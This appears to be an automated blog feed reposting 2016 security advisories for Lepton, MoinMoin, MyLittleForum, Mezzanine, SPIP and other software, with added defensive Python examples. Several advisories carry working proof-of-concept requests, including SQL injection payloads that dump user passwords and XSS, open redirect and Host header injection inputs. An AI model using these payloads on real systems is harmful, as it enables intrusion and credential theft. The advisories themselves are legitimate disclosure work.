Source: Gmail -> IFTTT-> Blogger
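The extension-check flaw described in the Lepton advisory above, as an added example that is not part of the original post and not Lepton's code (written in Python for illustration). `weak_check` is a hypothetical reconstruction of a check that accepts a name when any dot-separated part is allowed; the allowlist, the executable-extension set and all function names are assumptions.

```python
import os
import secrets

# Assumed policy values for this illustration (not taken from Lepton).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}
EXECUTABLE_EXTENSIONS = {
    "php", "php3", "php4", "php5", "phtml", "phar", "pl", "py", "cgi",
    "asp", "aspx", "jsp", "sh", "htm", "html", "svg", "js",
}


def weak_check(filename):
    """Flawed check: passes if ANY dot-separated part is an allowed extension.

    A name such as "avatar.jpg.php" passes because "jpg" appears before the
    extension that the web server will actually act on.
    """
    parts = filename.lower().split(".")[1:]
    return any(part in ALLOWED_EXTENSIONS for part in parts)


def strict_check(filename):
    """Hardened check on the client-supplied name.

    - only the FINAL extension decides, and it must be on the allowlist
    - no earlier part may be an executable type, because some server
      configurations act on any extension in the name (e.g. "x.php.jpg")
    - names with path components, NUL bytes or a leading dot are rejected
    """
    name = os.path.basename(filename.replace("\\", "/"))
    if not name or name != filename or name.startswith(".") or "\x00" in name:
        return False
    parts = name.lower().split(".")
    if len(parts) < 2:
        return False
    extensions = parts[1:]
    if extensions[-1] not in ALLOWED_EXTENSIONS:
        return False
    if any(ext.strip() in EXECUTABLE_EXTENSIONS for ext in extensions[:-1]):
        return False
    return True


def stored_name(filename):
    """Return a server-generated name that keeps only the vetted extension.

    Storing uploads under a random name removes every attacker-chosen part of
    the filename from the path the web server later resolves.
    """
    if not strict_check(filename):
        raise ValueError("upload rejected: disallowed file name")
    extension = filename.rsplit(".", 1)[1].lower()
    return secrets.token_hex(16) + "." + extension


if __name__ == "__main__":
    # Constructed sample names.
    for sample in ["photo.jpg", "avatar.jpg.php", "x.php.jpg", "notes.final.pdf"]:
        print(sample, "weak:", weak_check(sample), "strict:", strict_check(sample))
```

Serving the upload directory with script execution disabled and outside the web root remains necessary; the name check alone does not cover content-based attacks.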

[FD] Lepton 2.2.2: CSRF, Open Redirect, Insecure Bruteforce Protection & Password Handling

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: LEPTON 2.2.2 stable
Fixed in: 2.3.0
Fixed Version Link: http://ift.tt/2fLwZoM important-lepton-2.3.0-101.php
Vendor Website: http://ift.tt/2g2ZQb7
Vulnerability Type: CSRF, Open Redirect, Insecure Bruteforce Protection & Password Handling
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to public: 11/10/2016
Release mode: Coordinated Release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

Lepton is a content management system written in PHP. In version 2.2.2, it contains various low to medium impact issues. The functionality that operates on files and folders is vulnerable to CSRF which may lead to XSS, the logout is vulnerable to Open Redirect, the in-built bruteforce protection can be easily bypassed, and passwords are hashed with md5 and sent out via email in plaintext.

3. Details

CSRF

CVSS: Medium 4.0 AV:N/AC:H/Au:N/C:N/I:P/A:P

Description: All actions on folders and files are missing CSRF protection. Because of this, an attacker can delete, create, or rename folders and files. An attacker could for example create .html files which would lead to an XSS attack.

Proof of Concept:

Delete Folder:

Create File:

Open Redirect

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:NP

Description: The redirect parameter of the logout script is vulnerable to open redirect.

Proof of Concept:

http://localhost/LEPTON_stable_2.2.2/upload/account/logout.php?redirect=http://google.com

Insufficient Bruteforce Protection

Description: The bruteforce protection works on a per-session base, which is easily bypassed by an attacker by simply requesting a new session by not sending the current, locked session information. The current bruteforce protection may provide a false sense of security and should thus be removed or changed.

Code:

if($_SESSION['ATTEMPS'] > $this->max_attemps) {
    $this->warn();
}

Password Handling

The password reset functionality sends a newly generated password in plaintext via email, which is not recommended. Additionally, md5 is used for hashing, which is also not recommended.

4. Solution

To mitigate this issue please upgrade at least to version 2.3.0:

http://ift.tt/2fLwOda

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/06/2016 Vendor requests 60 days to release fix
10/25/2016 Vendor releases fix
11/10/2016 Disclosed to public

Blog Reference: http://ift.tt/2f6T1kz

Source: Gmail -> IFTTT-> Blogger
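Why a per-session failure counter such as the one quoted in the Lepton advisory above does not throttle guessing, next to a counter kept server-side per account and per client address. This is an added example, not part of the original post and not Lepton's code (Python for illustration); the class names, limits and the constructed client address are assumptions.

```python
import time

MAX_ATTEMPTS = 3        # assumed per-account limit inside the window
IP_MAX_ATTEMPTS = 15    # assumed per-address limit inside the window
WINDOW_SECONDS = 900    # assumed sliding window (15 minutes)


class SessionCounter:
    """Mirrors the quoted check: the counter is stored in the client's session."""

    def __init__(self):
        self.sessions = {}  # session id -> failed attempts

    def allowed(self, session_id):
        return self.sessions.get(session_id, 0) <= MAX_ATTEMPTS

    def record_failure(self, session_id):
        self.sessions[session_id] = self.sessions.get(session_id, 0) + 1


class LoginThrottle:
    """Failure counters keyed by target account and client address.

    The state lives on the server and is independent of any cookie, so
    discarding the session does not reset it. Per-account limits let a third
    party lock a user out; keep the window short or add a second factor.
    """

    def __init__(self, clock=time.monotonic):
        self.clock = clock
        self.failures = {}  # (kind, value) -> list of failure timestamps

    def _recent(self, key):
        cutoff = self.clock() - WINDOW_SECONDS
        kept = [t for t in self.failures.get(key, []) if t > cutoff]
        if kept:
            self.failures[key] = kept
        else:
            self.failures.pop(key, None)
        return len(kept)

    def allowed(self, username, client_ip):
        user_key = ("user", username.strip().lower())
        return (self._recent(user_key) < MAX_ATTEMPTS
                and self._recent(("ip", client_ip)) < IP_MAX_ATTEMPTS)

    def record_failure(self, username, client_ip):
        now = self.clock()
        for key in (("user", username.strip().lower()), ("ip", client_ip)):
            self.failures.setdefault(key, []).append(now)

    def record_success(self, username):
        self.failures.pop(("user", username.strip().lower()), None)


def simulate_fresh_sessions(guesses):
    """Model a client that never returns its session cookie.

    Returns (attempts the session counter let through,
             attempts the server-side throttle let through).
    """
    session_counter = SessionCounter()
    throttle = LoginThrottle(clock=lambda: 0.0)
    passed_session = passed_throttle = 0
    for n in range(guesses):
        session_id = f"session-{n}"          # a new session on every request
        if session_counter.allowed(session_id):
            passed_session += 1
            session_counter.record_failure(session_id)
        if throttle.allowed("admin", "203.0.113.7"):   # constructed address
            passed_throttle += 1
            throttle.record_failure("admin", "203.0.113.7")
    return passed_session, passed_throttle


if __name__ == "__main__":
    print(simulate_fresh_sessions(50))
```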

[FD] Lepton 2.2.2: SQL Injection

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: LEPTON 2.2.2 stable
Fixed in: 2.3.0
Fixed Version Link: http://ift.tt/2fLwZoM important-lepton-2.3.0-101.php
Vendor Website: http://ift.tt/2g2ZQb7
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to public: 11/10/2016
Release mode: Coordinated Release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

Lepton is a content management system written in PHP. In version 2.2.2, it is vulnerable to multiple SQL injections. The injections require a user account with elevated privileges.

3. Details

SQL Injection: Search Page

CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description: The "terms" parameter of the page search is vulnerable to SQL Injection. A user account with the right "Pages" is required to access this feature.

Proof of Concept:

POST /LEPTON_stable_2.2.2/upload/admins/pages/index.php?leptoken=3f7020b05ec343675b6b2z1472137594 HTTP/1.1
Host: localhost
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=fkb7do1domiofuavvof5qbsv66; lep8765sessionid=f3a67s8kh379l9bs2rkggtpt12
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 154

search_scope=title&terms=" union select username,2,3,4,5,6,password,email,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from lep_users -- -&search=Search

Blind or Error-based SQL Injection: Create Page

CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description: The "parent" parameter of the create page functionality is vulnerable to SQL Injection. A user account with the right "Pages" is required to access this feature. The injection is blind or error based in the case that PHP is configured to show errors.

Proof of Concept:

POST /LEPTON_stable_2.2.2/upload/admins/pages/add.php?leptoken=dbbbe0a5cca5d279f7cd2z1472142328 HTTP/1.1
Host: localhost
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=fkb7do1domiofuavvof5qbsv66; lep8765sessionid=uniltg734soq583l03clr0t6j0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

title=test&type=wysiwyg&parent=0 union select version()&visibility=public&submit=Add

Blind or Error-based SQL Injection: Add Droplet

CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description: The "Add_droplets" parameter of the droplet permission manager is vulnerable to SQL injection. A user account with access to the Droplets administration tool is required. The injection is blind or error based in the case that PHP is configured to show errors.

Proof of Concept:

POST /LEPTON_stable_2.2.2/upload/admins/admintools/tool.php?tool=droplets&leptoken=1eed21e683f216dbc9dc2z1472139075 HTTP/1.1
Host: localhost
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=fkb7do1domiofuavvof5qbsv66; lep8765sessionid=f3a67s8kh379l9bs2rkggtpt12
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 277

tool=droplets&perms=1&Add_droplets%5B%5D=1&Add_droplets%5B%5D=2' WHERE attribute='Add_droplets' or extractvalue(1,version())%23&Delete_droplets%5B%5D=1&Export_droplets%5B%5D=1&Import_droplets%5B%5D=1&Manage_backups%5B%5D=1&Manage_perms%5B%5D=1&Modify_droplets%5B%5D=1&save=Save

4. Solution

To mitigate this issue please upgrade at least to version 2.3.0:

http://ift.tt/2fLwOda

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/06/2016 Vendor requests 60 days to release fix
10/25/2016 Vendor releases fix
11/10/2016 Disclosed to public

Blog Reference: http://ift.tt/2g30Agk

Source: Gmail -> IFTTT-> Blogger

[FD] MoinMoin 1.9.8: XSS

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: MoinMoin 1.9.8
Fixed in: 1.9.9
Fixed Version Link: http://ift.tt/2faSzVx
Vendor Website: https://moinmo.in
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to public: 11/10/2016
Release mode: Coordinated Release
CVE: CVE-2016-7148, CVE-2016-7146
Credits: Tim Coen of Curesec GmbH

2. Overview

MoinMoin is an open source Wiki application written in Python. In version 1.9.8, it is vulnerable to two persistent XSS issues. This allows an attacker to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection.

3. Details

XSS 1: Persistent XSS (CVE-2016-7148)

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: A page name is echoed in the attach file page without encoding, leading to persistent XSS.

Proof of Concept:

To place the payload create a new page which contains the payload as name by visiting:

http://localhost:9090/newtest%27%22%3E%3Cimg%20src%3Dno%20onerror%3Dalert%287%29%3E?action=edit

To trigger the payload visit the attach file page:

http://localhost:9090/newtest%27%22%3E%3Cimg%20src%3Dno%20onerror%3Dalert%287%29%3E?action=AttachFile

Note that there must be at least one existing attachment.

XSS 2: Persistent XSS (CVE-2016-7146)

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: The GUI editor is vulnerable to XSS via a specifically crafted URL, as it echoes part of the URL without encoding in two different places. The issue can be exploited reflected or persistent.

Proof of Concept:

Reflected example (the page does not have to exist):

http://localhost:9090/'"> ?action=fckdialog&dialog=attachment

Alternatively, an attacker can create a page containing the payload:

http://localhost:9090/newtestfoo'%22%3E%3Cimg%20src=no%20onerror=alert(1)%3E

The payload is triggered when attaching a file via the GUI editor ("Edit (GUI)" -> "Attachment").

4. Solution

To mitigate this issue please upgrade at least to version 1.9.9:

http://ift.tt/2faSzVx

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Contacted Vendor, Vendor confirmed, Requested CVEs
09/06/2016 CVEs assigned and distributed to vendor
10/05/2016 Vendor requests more time
10/31/2016 Vendor releases fix
11/10/2016 Disclosed to public

Blog Reference: http://ift.tt/2eTLMfq

Source: Gmail -> IFTTT-> Blogger

[FD] MyLittleForum 2.3.6.1: CSRF

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: MyLittleForum 2.3.6.1
Fixed in: 2.3.7beta
Fixed Version Link: http://ift.tt/2g1R8X2 v2.3.7beta
Vendor Website: http://ift.tt/10EIkYz
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to public: 11/10/2016
Release mode: Coordinated Release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

MyLittleForum is forum software written in PHP. In version 2.3.6.1, it is vulnerable to cross site request forgery. An attacker could exploit this issue to add new users or change the status of existing users to administrator if a victim visits a website containing a specifically crafted payload while logged into MyLittleForum.

3. Details

CVSS: Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P

Description: There is no CSRF protection, allowing an attacker to perform actions for a victim if the victim visits an attacker controlled website while logged in.

Proof of Concept:

Add New User:

Make Existing User Admin:

4. Solution

To mitigate this issue please upgrade at least to version 2.3.7beta:

http://ift.tt/2fnqDvi

Please note that a newer version might already be available.

5. Report Timeline

09/05/2015 Informed Vendor about Issue (no reply)
09/15/2015 Reminded Vendor of Disclosure Date
09/15/2015 Vendor replies
10/04/2015 Vendor releases fix
11/10/2016 Disclosed to public

Blog Reference: http://ift.tt/2g1P3u7

Source: Gmail -> IFTTT-> Blogger

[FD] Mezzanine 4.2.0: XSS

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Mezzanine 4.2.0
Fixed in: 4.2.1
Fixed Version Link: http://ift.tt/2gpyLk6
Vendor Website: http://ift.tt/AbtAFJ
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to public: 11/10/2016
Release mode: Coordinated Release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

Mezzanine is an open source CMS written in Python. In version 4.2.0, it is vulnerable to two persistent XSS attacks, one of which requires extended privileges, the other one does not. These issues allow an attacker to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection.

3. Details

XSS 1: Persistent XSS via Name in Comments

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: When leaving a comment on a blog post, the author name is echoed unencoded in the backend, leading to persistent XSS.

Proof of Concept:

Leave a comment, as author name use:

'">

To trigger the payload, view the comment overview in the admin backend:

http://localhost:8000/admin/generic/threadedcomment

XSS 2: Persistent XSS via HTML file upload

CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:N/I:P/A:N

Description: When uploading files via the media manager, the extension .html is allowed, leading to XSS via file upload. An account with the permissions to upload files to the media manager is required.

Proof of Concept:

Visit the media manager and upload a .html file:

http://localhost:8000/admin/media-library/upload/?ot=desc&o=date

As uploaded files are stored inside the web root, it can now be accessed, thus executing the JavaScript code it contains:

http://localhost:8000/static/media/uploads/xss.html

4. Solution

To mitigate this issue please upgrade at least to version 4.2.1:

http://ift.tt/2gpyLk6

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/05/2016 Vendor replies
09/19/2016 Vendor releases fix
11/10/2016 Disclosed to public

Blog Reference: http://ift.tt/2gpBxFI

Source: Gmail -> IFTTT-> Blogger

[FD] SPIP 3.1: XSS & Host Header Injection

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: SPIP 3.1
Fixed in: 3.1.2 / 3.0.23
Fixed Version Link: http://ift.tt/2gpxw4o
Vendor Website: http://www.spip.net/
Vulnerability Type: Reflected & Persistent XSS, Host Header Injection, httpOnly Cookie disclosure
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to public: 11/10/2016
Release mode: Coordinated Release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

SPIP is a content management system written in PHP. In version 3.1, it is vulnerable to a persistent as well as reflected cross site scripting vulnerability as it allows users to enter URLs containing the JavaScript protocol, which an attacker can exploit to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection.

Additionally, it contains a Host Header Injection which may lead to the leakage of password reset tokens and thus the compromise of user accounts.

Finally, the application discloses httpOnly cookies, making exploitation of XSS issues slightly easier.

3. Details

Persistent XSS

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description: When posting a message in the internal Forum, user input is properly encoded, thus disallowing XSS. However, a hypertext link may be added as well, and there is no check on the protocol of the supplied link, which leads to an XSS vulnerability.

Proof of Concept:

1. Create a new Message: http://localhost/spip/ecrire/?exec=forum&repondre=new
2. In the URL field enter: javascript:alert(1)
3. Post the Message

To trigger the payload, a click on the link is required.

Reflected XSS

CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N

Description: When editing a private message, a redirect parameter may be submitted as well. This parameter decides to what page a user is returned if they were to press the back button. The value of this parameter is user controlled and may thus be used for phishing or XSS attacks.

Proof of Concept:

Visit: http://localhost/spip/ecrire/?exec=message_edit&new=oui&to=2&redirect=javascript:alert(1)
Click on the Back button represented by the envelope icon.

Host Header Injection

CVSS: Low 2.6 AV:N/AC:H/Au:N/C:P/I:N/A:N

Description: The application takes the Host Header and uses it in a password reset email. As the Host Header is user-controlled, an attacker can set it to arbitrary values.

In the case of a password reset page, this can lead to security issues as an attacker can request a password reset email for a user and set the Host header to a server they control. As this header is used in the email, a user would be sent to the attacker's server if they were to click on the link, leading to the leakage of the recovery token and thus the compromise of the account.

Proof of Concept:

Request:

POST /spip/spip.php?page=spip_pass&lang=en HTTP/1.1
Host: example.com
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: spip_accepte_ajax=1; spip_admin=%40admin; PHPSESSID=1l8rvbhcgia45ddj7ldoc1gpf6; wb-installer=3d2hes1b6i0bfb586iucm76sp2; wb-4174-sid=u571gr7isplq8b4f01fniqevk2
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 199

page=spip_pass&lang=en&formulaire_action=oubli&formulaire_action_args=orESpF0vSC3Q%2BB30uGEFqT7k6AcDObDMasMNzVp3EjndtlvZ%2B5k4g%2FkyF%2BAlzhBhCI%2F%2F9hx%2FZ33mkQPk&oubli=visitor%40example.com&nobot=

Email Send:

[My SPIP site] Forgotten password

(this is an automated message)
To recover your access to the site
My SPIP site (http://localhost/spip)

Please go to the following address:

http:// http://ift.tt/2g2TCG0

You can then enter a new password and log in to the site.

httpOnly Cookie Disclosure

Description: The phpinfo page discloses httpOnly cookies such as session cookies, making it slightly easier to exploit XSS vulnerabilities.

Proof of Concept:

http://localhost/spip/ecrire/?exec=info

4. Solution

To mitigate this issue please upgrade at least to version 3.1.2:

http://ift.tt/2gpxw4o

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/23/2016 Vendor releases fix
11/10/2016 Disclosed to public

Blog Reference: http://ift.tt/2g2XTsP

Source: Gmail -> IFTTT-> Blogger
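Server-side checks for the three URL-handling issues in the SPIP advisory above: link scheme, redirect target, and the host used in a password reset link (the redirect check also applies to the logout redirect parameter in the Lepton advisory). This is an added example, not part of the original post and not SPIP's code (Python for illustration). `CANONICAL_BASE`, the `token` parameter name and all function names are assumptions.

```python
from urllib.parse import urlencode, urlsplit

# Assumed deployment setting: the one public URL of the site, set by the
# administrator. It is never derived from the request's Host header.
CANONICAL_BASE = "https://cms.example.org/spip"
TRUSTED_HOSTS = {urlsplit(CANONICAL_BASE).netloc}
ALLOWED_LINK_SCHEMES = {"http", "https", "mailto"}


def _clean(url):
    """Drop the characters browsers ignore when parsing a URL.

    Leading/trailing whitespace and embedded control characters (tab, CR, LF)
    are removed so that "java<TAB>script:" is judged as the browser sees it.
    The cleaned value is also the one that gets stored or emitted.
    """
    return "".join(ch for ch in url.strip() if ord(ch) >= 0x20)


def safe_link(url):
    """Return the cleaned URL if its scheme is allowlisted, else None.

    An allowlist is used because deny-listing "javascript:" misses
    data:, vbscript: and case or whitespace variants.
    """
    cleaned = _clean(url)
    try:
        parts = urlsplit(cleaned)
    except ValueError:
        return None
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_LINK_SCHEMES:
        return None
    if scheme in ("http", "https") and not parts.netloc:
        return None
    return cleaned


def safe_redirect(target, default="/"):
    """Accept only same-site absolute paths as redirect targets."""
    cleaned = _clean(target)
    try:
        parts = urlsplit(cleaned)
    except ValueError:
        return default
    if parts.scheme or parts.netloc:
        return default                      # absolute or scheme-relative URL
    if not cleaned.startswith("/") or cleaned.startswith("//") or "\\" in cleaned:
        return default
    return cleaned


def host_is_trusted(host_header):
    """Check the request's Host header against the configured host list."""
    return host_header.strip().lower() in TRUSTED_HOSTS


def build_reset_link(token):
    """Build the emailed link from configuration only.

    "token" is a placeholder parameter name for this illustration.
    """
    query = urlencode({"page": "spip_pass", "token": token})
    return f"{CANONICAL_BASE}/spip.php?{query}"


if __name__ == "__main__":
    # Constructed sample inputs.
    print(safe_link("javascript:alert(1)"))
    print(safe_redirect("/ecrire/?exec=messages"))
    print(host_is_trusted("example.com"), build_reset_link("tok123"))
```

Requests whose Host header fails `host_is_trusted` are best rejected at the web server or reverse proxy as well, so that the application never sees them.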

[FD] MyLittleForum 2.3.6.1: XSS & RPO

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: MyLittleForum 2.3.6.1
Fixed in: 2.3.7beta
Fixed Version Link: http://ift.tt/2g1R8X2 v2.3.7beta
Vendor Website: http://ift.tt/10EIkYz
Vulnerability Type: XSS & RPO
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to public: 11/10/2016
Release mode: Coordinated Release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

MyLittleForum is forum software written in PHP. In version 2.3.6.1, it is vulnerable to reflected cross site scripting as well as relative path overwrite. XSS can be used to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection, and RPO may lead to CSS injection.

3. Details

Reflected XSS

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description: The username and email parameter of the add user page are vulnerable to reflected XSS.

Proof of Concept:

Relative Path Overwrite

Description: Because the application includes CSS files relative instead of absolute, an attacker can overwrite the path. With some browsers, this may lead to CSS injection.

Proof of Concept:

http://localhost/mylittleforum-2.3.6.1/index.php////?id=1

4. Solution

To mitigate this issue please upgrade at least to version 2.3.7beta:

http://ift.tt/2fnqDvi

Please note that a newer version might already be available.

5. Report Timeline

09/05/2015 Informed Vendor about Issue (no reply)
09/15/2015 Reminded Vendor of Disclosure Date
09/15/2015 Vendor replies
10/04/2015 Vendor releases fix
11/10/2016 Disclosed to public

Blog Reference: http://ift.tt/2eMWhGo

Source: Gmail -> IFTTT-> Blogger

[FD] Microsoft Internet Explorer 11 iertutil LCIEGetTypedComponentFromThread use-after-free details

Throughout November, I plan to release details on vulnerabilities I found in web-browsers which I've not released before. This is the thirteenth entry in that series. Unfortunately I won't be able to publish everything within one month at the current rate, so I may continue to publish these through December and January.

The below information is available in more detail on my blog at http://ift.tt/2g1LYKv. Follow me on http://twitter.com/berendjanwever for daily browser bugs.

Microsoft Internet Explorer 11 iertutil LCIEGetTypedComponentFromThread use-after-free
=======================================================================
(The fix and CVE number for this issue are unknown)

Synopsis

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2015-2482 MSIE 8 jscript RegExpBase::FBadHeader use-after-free details

Throughout November, I plan to release details on vulnerabilities I found in web-browsers which I've not released before. This is the twelfth entry in that series. Unfortunately I won't be able to publish everything within one month at the current rate, so I may continue to publish these through December and January.

The below information is available in more detail on my blog at http://ift.tt/2ffQrcO. Follow me on http://twitter.com/berendjanwever for daily browser bugs.

MSIE 8 jscript RegExpBase::FBadHeader use-after-free
====================================================
(MS15-018, CVE-2015-2482)

Synopsis

Source: Gmail -> IFTTT-> Blogger

[FD] CVE request - Samsung Mobile Phone SVE-2016-6343: Unauthorized API access via system service call

Hi,

I'd like to request CVE for the following vulnerability fixed in NOV,2016.

Fix: http://ift.tt/2fcgN2i

Description of the security vulnerability:

Severity: Medium
Affected versions: M(6.0)
Reported on: May 26, 2016
Disclosure status: Privately disclosed.

The vulnerability allowing unauthorized access to system APIs from system service with improper access control enables attackers to control the device screen. The patch includes checks for access control.

Best Regards,
0xr0ot(行之)

Source: Gmail -> IFTTT-> Blogger

[FD] Reason Core Security v1.2.0.1 - Unquoted Path Privilege Escalation Vulnerability

Document Title:
===============
Reason Core Security v1.2.0.1 - Unquoted Path Privilege Escalation Vulnerability

References (Source):
====================
http://ift.tt/2ewOpZi

Release Date:
=============
2016-11-14

Vulnerability Laboratory ID (VL-ID):
====================================
2003

Common Vulnerability Scoring System:
====================================
4

Product & Service Introduction:
===============================
Reason Core Security is an anti-malware program designed by developers HerdProtect. This program is intended for use with your existing antivirus software and acts as a second layer of defense in the event that the malware slips past the real-time protection of your antivirus program.

(Copy of the Vendor Homepage: http://ift.tt/1PR6CKZ )

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered an unquoted service path privilege escalate vulnerability in the Reason Core Security anti-virus software.

Vulnerability Disclosure Timeline:
==================================
2016-11-14: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
HerdProtect
Product: Reason Core Security - Software 1.2.0.1

Exploitation Technique:
=======================
Local

Severity Level:
===============
Medium

Technical Details & Description:
================================
The application suffers from an unquoted search path issue in the official Reason Core Security v1.2.0.1 anti-virus software. The issue allows authorized but unprivileged local users to execute arbitrary code with system privileges on the active system. The attack vector of the vulnerability is local.

Proof of Concept (PoC):
=======================
The issue can be exploited by local attackers with restricted system user account or network access and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

-- PoC Exploitation

Source: Gmail -> IFTTT-> Blogger

[FD] EditMe CMS - CSRF Privilege Escalate Web Vulnerability

Document Title:
===============
EditMe CMS - CSRF Privilege Escalate Web Vulnerability

References (Source):
====================
http://ift.tt/2eWQf4t

Release Date:
=============
2016-11-14

Vulnerability Laboratory ID (VL-ID):
====================================
1996

Common Vulnerability Scoring System:
====================================
2.8

Product & Service Introduction:
===============================
EditMe is a framework that serves as a Platform as a Service to build custom Web Applications, Web Prototyping, and Web CMS. CMS in which any page can be a server side script that implements whatever dynamic functionality you dream up. That's EditMe. No FTP servers, compilers or IDEs required. EditMe's API uses server-side JavaScript and our templates use XML, so there are no new languages to learn.

(Copy of the Vendor Homepage: http://www.editme.com/ )

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a csrf privilege escalate web vulnerability in the official EditMe content management system.

Vulnerability Disclosure Timeline:
==================================
2016-11-14: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A cross site request forgery vulnerability has been discovered in the official EditMe content management system. The vulnerability allows to perform malicious client-side web-application requests to execute non-protected functions with own web context. In the absence of security token, an attacker could execute arbitrary code in the administrators browser to gain unauthorized access to the administrator access privileges.

Proof of Concept (PoC):
=======================
Cross site request forgery web vulnerability can be exploited by malicious web application without privileged user account and without user interaction. To demonstrate safety or reproduce csrf web vulnerability information and follow the steps below to continue provided.

Source: Gmail -> IFTTT-> Blogger

3 Mobile UK Hacked – 6 Million Customers' Private Data at risk

Three, one of UK's biggest mobile operators, has become the latest victim of a massive data breach that reportedly left the personal information and contact details of 6 Million of its customers exposed. The company admitted the data breach late Thursday, saying that computer hackers gained access to a Three Mobile customer phone upgrade database containing the account details of nearly 6


from The Hacker News http://ift.tt/2faOgcP
via IFTTT

[FD] Habari CMS v0.9.2 - (Backend Comments) XSS Vulnerability

Document Title:
===============
Habari CMS v0.9.2 - (Backend Comments) XSS Vulnerability

References (Source):
====================
http://ift.tt/2fClouO

Release Date:
=============
2016-11-09

Vulnerability Laboratory ID (VL-ID):
====================================
1999

Common Vulnerability Scoring System:
====================================
3.5

Product & Service Introduction:
===============================
While there are a number of technical reasons that highlight the differences and advantages Habari has over other blogging packages, a major component of what makes Habari different is its community participation model.

(Copy of the Homepage: http://ift.tt/2g4vH9t )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site scripting vulnerability in the Habari v0.9.2 content management system.

Vulnerability Disclosure Timeline:
==================================
2016-11-09: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Habari
Product: Habari - Content Management System 0.9.2

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A persistent cross site scripting web vulnerability has been discovered in the official Habari CMS v0.9.2. The vulnerability allows remote attackers to inject own malicious script code on the application-side of affected web modules or service function.

The persistent cross site scripting web vulnerability is located in the `name` parameter of the `comments` module. Remote attackers without privileged web-application user accounts are able to inject malicious script code to the comments backend. Thus allows remote attackers to execute script code on preview of the comments section for administrators in the application backend. The attack vector of the issue is persistent and the request method to inject the malicious comments is POST. The vulnerability is a classic cross site scripting issue that affects the backend to compromise administrator accounts.

The security risk of the issue is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5. Exploitation of the web vulnerability requires no privileged web-application user account and only low user interaction. Successful exploitation of the vulnerability results in persistent phishing attacks, session hijacking, persistent external redirect to malicious sources and persistent manipulation of affected or connected web module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Feedback - Comments

Vulnerable Parameter(s):
[+] comment_name

Affected Module(s):
[+] Backend - Comments

Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without user account and with low user interaction. For security demonstration or to reproduce follow the provided information and steps below to continue.

